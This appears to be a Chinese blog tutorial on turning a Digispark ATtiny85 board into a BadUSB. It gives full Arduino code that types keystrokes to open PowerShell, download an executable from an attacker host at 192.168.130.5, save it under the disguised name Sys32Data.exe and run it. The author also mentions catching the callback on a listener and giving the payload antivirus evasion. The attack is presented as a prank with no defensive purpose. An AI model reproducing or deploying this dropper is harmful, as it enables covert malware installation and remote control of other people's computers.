badusb

badusb


Badusb

  • 官网地址下载Windows——64位下的,或者用kali自带的:

https://www.arduino.cc/en/software

截图

  • 安装Digispark (Attiny85)开发板驱动。

https://github.com/lilygo/digispark-attiny85-driver-install

截图

  • 打开Arduino软件,点击文件中的首选项,附加开发板管理器网址填入::

http://digistump.com/package_digistump_index.json

截图

  • 工具-->开发板-->开发板管理器,我这里选择的是DIGISTUMP AVR BOARDS,然后就是下载一会,需要挂代理

截图

  • 插入开发板后可以在设备管理器这里看到效果:

截图

  • 代码如下:
#define kbd_es_es
#include <DigiKeyboard.h>

void setup() {}

void loop()
{
 int d=1000;
 DigiKeyboard.sendKeyStroke(0);
 DigiKeyboard.delay(d);
 DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
 DigiKeyboard.delay(600);
 DigiKeyboard.print("powershell");
 DigiKeyboard.delay(50);
 DigiKeyboard.sendKeyStroke(KEY_ENTER);
 DigiKeyboard.delay(d);
 DigiKeyboard.print("$client = new-object System.Net.WebClient");
 DigiKeyboard.sendKeyStroke(KEY_ENTER);
 DigiKeyboard.delay(d);
 DigiKeyboard.print("$client.DownloadFile('http://192.168.130.5/go-sc2.exe','Sys32Data.exe')");
 DigiKeyboard.sendKeyStroke(KEY_ENTER);
 DigiKeyboard.print("start Sys32Data.exe");
 DigiKeyboard.sendKeyStroke(KEY_ENTER);
 DigiKeyboard.delay(d);
 DigiKeyboard.print("exit");
 DigiKeyboard.sendKeyStroke(KEY_ENTER);
 for(;;){}
}
  • 先编译一下,如果没有报错就可以继续:

截图

  • 点击这里,编译上传到开发板中,需要在60s之内插入badusb:

截图

  • 等待烧录完成即可:

截图

  • kali开启Apache(处于演示没使用服务器),将放在www目录用以下载:

截图

  • 设置好监听上线后恶作剧一下看效果:

截图

  • 我的做了免杀,去框被杀概率高,后续可以继续改进。win10上效果如下:

截图

posted @ 2022-12-18 19:30  lockly  阅读(111)  评论(0编辑  收藏  举报